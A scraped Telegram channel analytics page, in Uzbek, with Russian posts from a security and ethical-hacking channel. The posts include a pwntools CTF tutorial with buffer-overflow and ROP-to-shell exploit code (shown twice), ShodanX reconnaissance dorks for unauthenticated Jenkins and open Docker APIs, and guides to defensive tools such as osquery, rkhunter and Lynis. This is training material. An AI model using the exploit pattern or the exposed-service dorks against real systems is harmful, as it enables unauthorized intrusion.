CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Ko'proq ko'rsatish📈 Telegram kanali CodeGuard: PySec Edition analitikasi
CodeGuard: PySec Edition kanali faol ishtirokchi. Hozirda hamjamiyat 14 097 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 8 760-o'rinni va Rossiya mintaqasida 45 869-o'rinni egallagan.
📊 Auditoriya ko‘rsatkichlari va dinamika
невідомо sanasidan buyon loyiha tez o‘sib, 14 097 obunachiga ega bo‘ldi.
26 Sentabr, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 821 ga, so‘nggi 24 soatda esa 0 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.
- Tasdiqlash holati: Tasdiqlanmagan
- Jalb etish (ER): Auditoriya o‘rtacha 9.98% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 5.58% ini tashkil etuvchi reaksiyalarni to‘playdi.
- Post qamrovi: Har bir post o‘rtacha 1 407 marta ko‘riladi; birinchi sutkada odatda 786 ta ko‘rish yig‘iladi.
- Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 8 ta reaksiya keladi.
- Tematik yo‘nalishlar: Kontent codeguard, pysec, docker, grep, контейнер kabi asosiy mavzularga jamlangan.
📝 Tavsif va kontent siyosati
Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Yuqori yangilanish chastotasi (oxirgi ma’lumot 27 Sentabr, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.
▶️ CTF-мод — автоматизируем всё, что движется: от брута флагов до ROP-цепочек Шеллкод на коленке — генерируем, пакуем и тестим без лишних телодвижений ▶️ Работа с бинарником — ищем гаджеты, дырявим GOT/PLT, дизлайбим либы ▶️ Сетевое общение — TCP/UDP, шелл, SSH — общаемся с жертвой как с другом ▶️ Дебёг как бог — GDB-интеграция, брейкпоинты, трассировка без слёз💻 Ставим эту магию (Python 3.6+ или иди нахуй):
pip install pwntools # если не сломалось — ты счастливчик
🚀 Быстрый старт (для тех, кто не любит читать мануалы):
Простой пример — подключиться к серверу и получить флаг:
from pwn import *
# Подключаемся к таске
conn = remote('ctf.example.com', 1337)
# Ждём приветствия
conn.recvuntil(b'Enter password:')
# Шлём наш гениальный эксплоит
conn.sendline(b'A' * 64 + p64(0x401152)) # переполнение буфера + адрес победы
# Получаем флаг и улыбаемся
print(conn.recvall().decode())
🛠 Продвинутые фишки (когда нужно выебать ядро):
ROP-цепочка для обхода DEP:
from pwn import *
context.binary = './vuln'
# Автоматически ищем гаджеты
rop = ROP(context.binary)
rop.execve(next(context.binary.search(b'/bin/sh')), 0, 0)
# Собираем полезную нагрузку
payload = flat(
b'A' * 64,
rop.chain()
)
# Отправляем и получаем шелл
io = process('./vuln')
io.sendline(payload)
io.interactive() # welcome to root!
Интеграция с GDB (для параноиков):
io = gdb.debug('./vuln', gdbscript='''
break *main+0x42
continue
''')
# Смотрим дамп памяти после краша
io.wait()
core = io.corefile
print(hex(core.rsp)) # где упал — там и ищи сокровища
📌 Когда использовать эту хрень:
🔴 CTF — если надоело вручную собирать эксплоиты 🔴 Баг-баунти — тестируем веб-сервисы на устойчивость к пиздецу 🔴 Образование — учимся эксплоитингу без скучных мануалов 🔴 Исследования — разбираемся, как ломаются бинарники вживую⚠️Предупреждение (шоб мусора не навести):
🔵Используй только на своих тасках или с разрешения владельца 🔵Не забывай про context.log_level = 'debug' — иногда полезно увидеть, что там внутри творится 🔵Если эксплоит не работает — это не баг, это фича. Перечитай доки.💡 Совет: Начни с локальных бинарников из CTF-тасок — так безопаснее и проще понять, как эта бандура работает. А потом уже можно и на реальные цели переходить (если разрешили, конечно). 😈 CodeGuard: PySec Edition | Чат
▶️ CTF-мод — автоматизируем всё, что движется: от брута флагов до ROP-цепочек Шеллкод на коленке — генерируем, пакуем и тестим без лишних телодвижений ▶️ Работа с бинарником — ищем гаджеты, дырявим GOT/PLT, дизлайбим либы ▶️ Сетевое общение — TCP/UDP, шелл, SSH — общаемся с жертвой как с другом ▶️ Дебёг как бог — GDB-интеграция, брейкпоинты, трассировка без слёз💻 Ставим эту магию (Python 3.6+ или иди нахуй):
pip install pwntools # если не сломалось — ты счастливчик
🚀 Быстрый старт (для тех, кто не любит читать мануалы):
Простой пример — подключиться к серверу и получить флаг:
from pwn import *
# Подключаемся к таске
conn = remote('ctf.example.com', 1337)
# Ждём приветствия
conn.recvuntil(b'Enter password:')
# Шлём наш гениальный эксплоит
conn.sendline(b'A' * 64 + p64(0x401152)) # переполнение буфера + адрес победы
# Получаем флаг и улыбаемся
print(conn.recvall().decode())
🛠 Продвинутые фишки (когда нужно выебать ядро):
ROP-цепочка для обхода DEP:
from pwn import *
context.binary = './vuln'
# Автоматически ищем гаджеты
rop = ROP(context.binary)
rop.execve(next(context.binary.search(b'/bin/sh')), 0, 0)
# Собираем полезную нагрузку
payload = flat(
b'A' * 64,
rop.chain()
)
# Отправляем и получаем шелл
io = process('./vuln')
io.sendline(payload)
io.interactive() # welcome to root!
Интеграция с GDB (для параноиков):
io = gdb.debug('./vuln', gdbscript='''
break *main+0x42
continue
''')
# Смотрим дамп памяти после краша
io.wait()
core = io.corefile
print(hex(core.rsp)) # где упал — там и ищи сокровища
📌 Когда использовать эту хрень:
🔴 CTF — если надоело вручную собирать эксплоиты 🔴 Баг-баунти — тестируем веб-сервисы на устойчивость к пиздецу 🔴 Образование — учимся эксплоитингу без скучных мануалов 🔴 Исследования — разбираемся, как ломаются бинарники вживую⚠️Предупреждение (шоб мусора не навести):
🔵Используй только на своих тасках или с разрешения владельца 🔵Не забывай про context.log_level = 'debug' — иногда полезно увидеть, что там внутри творится 🔵Если эксплоит не работает — это не баг, это фича. Перечитай доки.💡 Совет: Начни с локальных бинарников из CTF-тасок — так безопаснее и проще понять, как эта бандура работает. А потом уже можно и на реальные цели переходить (если разрешили, конечно). 😈 CodeGuard: PySec Edition | Чат
▶️ Модульная разведка — 15+ специализированных команд для доменов, поддоменов, SSL, организаций ▶️ Работа с базами Shodan — доступ к CVE Database, EntityDB, ExposureDB, FaviconMap ▶️ Визуализация данных — географическое отображение (map) exposed-сервисов по миру ▶️ Расширенные запросы — поддержка кастомных dorks и фильтров Shodan ▶️ Пассивное обнаружение — поиск поддоменов через DNS-данные Shodan без прямого взаимодействия с целью ▶️ Интеграция с InternetDB — быстрый анализ IP и доменов через lightweight API Shodan✨ Быстрый старт с ShodanX: Установка (требуется Python 3.13+):
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
Первоначальная настройка:
# 1. Сохраняем API-ключ Shodan
shodanx auth
# 2. Логин через session cookie (для премиум-функций)
shodanx login
# Куки копируем из DevTools: .shodan.io → session
# 3. Проверяем доступ
shodanx login
Базовые команды разведки:
# Разведка по домену (порты, хосты, метаданные)
shodanx domain example.com
# Пассивный поиск поддоменов
shodanx subdomain example.com
# Поиск по SSL-отпечатку (tracking reused certs)
shodanx ssl <sha1_fingerprint>
# Организационный поиск (использование facets)
shodanx org "Company Name"
# Поиск уязвимых систем через CVE
shodanx cvedb CVE-2024-12345
🔍 Продвинутые сценарии:
Географическая визуализация exposed-сервисов:
# Требуется премиум-подписка Shodan
shodanx map "port:22 country:RU"
Кастомные dorks для bug bounty:
# Поиск Jenkins без аутентификации
shodanx custom 'http.component:jenkins "200 OK"'
# Поиск открытых Docker API
shodanx custom 'product:docker port:2375'
Трекинг инфраструктуры через favicon:
# Поиск систем по уникальному фавикону
shodanx faviconmap <favicon_hash>
📌 Когда использовать ShodanX:
🔴 Расширение атакуемой поверхности — автоматический поиск забытых сервисов и поддоменов
🔴 Подготовка к внешнему пентесту — разведка открытых портов и технологий цели
🔴 Threat Intelligence — мониторинг эксплойтов в дикой природе через CVE-привязку
🔴 Исследование IoT/инфраструктуры — картографирование сетей по организациям и странам
🔴 Расследование инцидентов — поиск следов компрометации в открытых источниках
🛠 Интеграция в пайплайн:
# Пример скрипта для автоматической разведки
#!/bin/bash
DOMAIN=$1
echo "[*] Starting ShodanX reconnaissance for $DOMAIN"
shodanx domain $DOMAIN > domain_scan.json
shodanx subdomain $DOMAIN > subdomains.txt
shodanx ssl $(get_ssl_fingerprint $DOMAIN) > ssl_assets.json
# Дальнейшая обработка через jq, grep и т.д.
⚠️ Требования и ограничения:
🔴 API-ключ Shodan обязателен (бесплатный аккаунт — 100 запросов/месяц)
🔴 Session cookie нужен для функций map и trends (премиум-подписка)
🔴 Shodan Enterprise требуется для модуля trends (анализ исторических данных)
🔴 Python 3.13+ — более старые версии не поддерживаются
📌 Ссылка на репозиторий
💡 Совет: Начните с бесплатного API-ключа Shodan, чтобы оценить возможности. Для серьезной работы потребуется платная подписка ($59/месяц), но даже бесплатный лимит позволяет проводить точечную разведку.
😈 CodeGuard: PySec Edition | Чат🔵Разведка и картография 🔵Социальная инженерия 🔵Скрытность и импланты 🔵Защита от атрибуцииНравятся книга? ❤️ — Да 🔥 — Нет 👩💻 Кликай и качай 😈 CodeGuard: PySec Edition | Чат
🟢 Декомпиляция в читаемый псевдокод 🟢Анализ ELF / PE / Mach‑O 🟢 Автоматизация и скрипты 🟢Кроссплатформенность 🟢 Open Source от NSA🧠 Зачем она нужна
➡️ Реверс-инжиниринг и аудит безопасности ➡️Анализ вредоносного ПО ➡️ Изучение low‑level логики ➡️ Обучение и практика ➡️ Бесплатная альтернатива IDA Pro🧪 Использование из терминала Запуск Ghidra:
./ghidraRun
Анализ бинарника в headless‑режиме (без GUI):
./analyzeHeadless ~/ghidra_projects test_project \
-import ./binary \
-analysisTimeoutPerFile 60
Запуск анализа с авто‑декомпиляцией:
./analyzeHeadless ~/ghidra_projects test_project \
-import ./binary \
-postScript DecompileAllFunctions.java
Удаление проекта:
rm -rf ~/ghidra_projects/test_project
🔗 Исходники
😈 CodeGuard: PySec Edition | Чат🔹 Хакер или инсайдер 🔹 Вредоносное ПО 🔹 Фишинг 🔹 Ошибка администратора 🔹 Пожар, отключение электричестваУгроза сама по себе ещё ничего не ломает — она лишь существует. 🔸 Vulnerability (Уязвимость) Уязвимость — это слабое место, через которое угроза может реализоваться. Примеры:
🔹 Необновлённый софт 🔹 Пароль admin123 🔹 Открытый S3-бакет 🔹 Отсутствие MFA 🔹 Лишние права у пользователяУязвимость без угрозы — просто дефект. Угроза без уязвимости — почти бесполезна. ⚠️ Risk (Риск) Риск — это вероятность + ущерб, если угроза использует уязвимость. Примеры:
🔹 Утечка ПДн клиентов 🔹 Простой сервиса 🔹 Штрафы и репутационные потери 🔹 Потеря интеллектуальной собственностиВ ИБ борются не с угрозами, а с рисками. 🧠 Как это связано?
🔴 Угроза — кто или что может атаковать 🔵 Уязвимость — через что могут атаковать ⏺ Риск — что будет, если это случитсяЕсли по-простому:
➡️ Патч закрывает уязвимость ➡️ Антивирус снижает влияние угрозы ➡️ Бизнес решает, какой риск допустим😈 CodeGuard: PySec Edition | Чат
🟢 нужен контроль и видимость, а не разовый чек 🟢 важно ловить аномалии, а не только известные сигнатуры 🟢 сервер/хост живёт долго и меняется со временем 🟢 хочется гибкую основу под security-мониторинг⚙️ Ключевые возможности osquery:
🔵 Доступ к процессам, файлам, сокетам, пользователям через SQL 🔵 Поиск подозрительных бинарей, автозапусков, cron-задач 🔵 Мониторинг сетевых соединений и открытых портов 🔵 Scheduled queries + логирование изменений 🔵 Интеграция с SIEM, Elastic, Fleet, Loki и др.⚡️ Примеры реальных запросов:
-- Все процессы, слушающие сеть
SELECT pid, name, local_port FROM listening_ports;
-- Подозрительные cron-задачи
SELECT * FROM crontab WHERE command NOT LIKE '%/usr%';
-- Новые бинарники в /tmp
SELECT * FROM file WHERE path LIKE '/tmp/%';
📌 Что реально помогает найти:
🟢 скрытые persistence-механизмы 🟢 нелегитимные сетевые соединения 🟢 странные cron / systemd-юниты 🟢 появление новых пользователей и ключей 🟢 медленные, «тихие» компрометацииГде osquery раскрывается:
🔴 Прод-сервера и VPS 🔴 Хосты с долгим аптаймом 🔴 SOC / blue team / IR 🔴 В связке с rkhunter, AIDE, Wazuh 🔴 Как основа для кастомного security-мониторинга😈 CodeGuard: PySec Edition | Чат
🟢 нужен более тщательный аудит, чем «разок проверить» 🟢 важно отслеживать изменения системы со временем 🟢 сервер живёт долго и не должен удивлять сюрпризами 🟢 хочется early-warning, а не post-mortem⚙️ Ключевые возможности rkhunter:
🔵 Поиск известных руткитов, бэкдоров и локальных эксплойтов 🔵 Проверка системных бинарников по хешам 🔵 Анализ прав доступа и опасных конфигураций 🔵 Детект скрытых файлов, процессов и сетевых аномалий 🔵 Логи + режим регулярного cron-сканирования⚡️ Быстрый старт с rkhunter: Установка:
sudo apt install rkhunter # Debian/Ubuntu
sudo dnf install rkhunter # RHEL/CentOS
Обновление сигнатур:
sudo rkhunter --update
Первичное сканирование:
sudo rkhunter --check
📌 Что реально находит:
🟢 подмену системных утилит (ls, ps, netstat и др.) 🟢 подозрительные права на важные файлы 🟢 следы популярных руткитов и бэкдоров 🟢 небезопасные настройки SSH, cron, sysctl 🟢 аномалии, появившиеся после взломаГде использовать rkhunter:
🔴 Долгоживущие прод‑серверы 🔴 VPS с публичным доступом 🔴 Регулярный security‑мониторинг через cron 🔴 В связке с Chkrootkit, Lynis, AIDE 🔴 Как система раннего оповещения, а не «после пожара»😈 CodeGuard: PySec Edition | Чат
🟢 нужно быстро проверить сервер без установки агентов 🟢 важен простой аудит безопасности 🟢 хочется понять, не скрываются ли в системе угрозы⚙️ Ключевые возможности Chkrootkit:
🔵 Проверка известных руткитов и троянов 🔵 Сканирование системных процессов и модулей ядра 🔵 Поиск подозрительных бэкендов inetd, sshd, cron 🔵 Проверка ключевых бинарников на модификации 🔵 Лёгкий, работает без сети и демонов⚡️ Быстрый старт с Chkrootkit: Установка:
sudo apt install chkrootkit # Debian/Ubuntu
sudo dnf install chkrootkit # RHEL/CentOS
Запуск сканирования:
sudo chkrootkit
📌 Что реально находит:
🟢 скрытые процессы и демоны 🟢 подменённые системные бинарники 🟢 следы популярных руткитов 🟢 подозрительные сетевые подключения 🟢 эксплойты локальных сервисовГде использовать Chkrootkit:
🔴 Быстрый security-чек на прод-серверах 🔴 Регулярные проверки VPS и домашних серверов 🔴 В связке с Lynis, AIDE или auditd 🔴 Как baseline перед детальным pentest’ом😈 CodeGuard: PySec Edition | Чат
🔵Поддержка ELF, PE, Mach-O 🔵x86, x64, ARM, MIPS 11 движков декомпиляции одновременно 🔵Сравнение выхода side-by-side 🔵Шаринг результатов по ссылке 🔵Бесплатно, без регистрации💡Почему стоит в закладки:
🔴Один декомпилятор выдал мусор - другой справился 🔴Не нужно ставить тяжёлые тулзы локально 🔴Быстрый анализ CTF-тасков 🔴Видишь как разные инструменты интерпретируют один код 🔴Учишься понимать, какой декомпилятор лучше для чегоТипичный юзкейс: Скачал подозрительный
.exe или получил бинарь на CTF. Закинул в Dogbolt - через минуту читаешь псевдо-C код из 11 источников. Ghidra показал undefined4? Binary Ninja уже распознал структуру.
Незаменим для reverse engineering, malware analysis и когда IDA тупит.
⭐️Сервис
😈 CodeGuard: PySec Edition | Чат🟢 нужен быстрый security-чек без агентов 🟢 важно понять реальный уровень hardening 🟢 система уже в проде и ломать ничего нельзя⚙️ Ключевые возможности Lynis:
🔵 Глубокий аудит конфигурации ОС 🔵 Проверка прав, сервисов, kernel-настроек 🔵 Анализ SSH, PAM, cron, logging, firewall 🔵 Security score + конкретные рекомендации 🔵 Работает локально, без демонов и сети⚡️ Быстрый старт с Lynis: Установка:
sudo apt install lynis # Debian/Ubuntu
sudo dnf install lynis # RHEL/CentOS
Запуск аудита:
sudo lynis audit system
Отчёты:
/var/log/lynis.log
/var/log/lynis-report.dat
📌 Что реально находит:
🟢 слабые SSH-настройки 🟢 небезопасные kernel-параметры 🟢 лишние сервисы и демоны 🟢 проблемы с правами и логированием 🟢 плохие практики hardeningГде использовать Lynis:
🔴 Быстрый аудит перед продом 🔴 Регулярные security-чеки серверов 🔴 Hardened-хосты и VPS 🔴 В связке с AIDE / auditd / SIEM 🔴 Как baseline перед pentest’ом😈 CodeGuard: PySec Edition | Чат
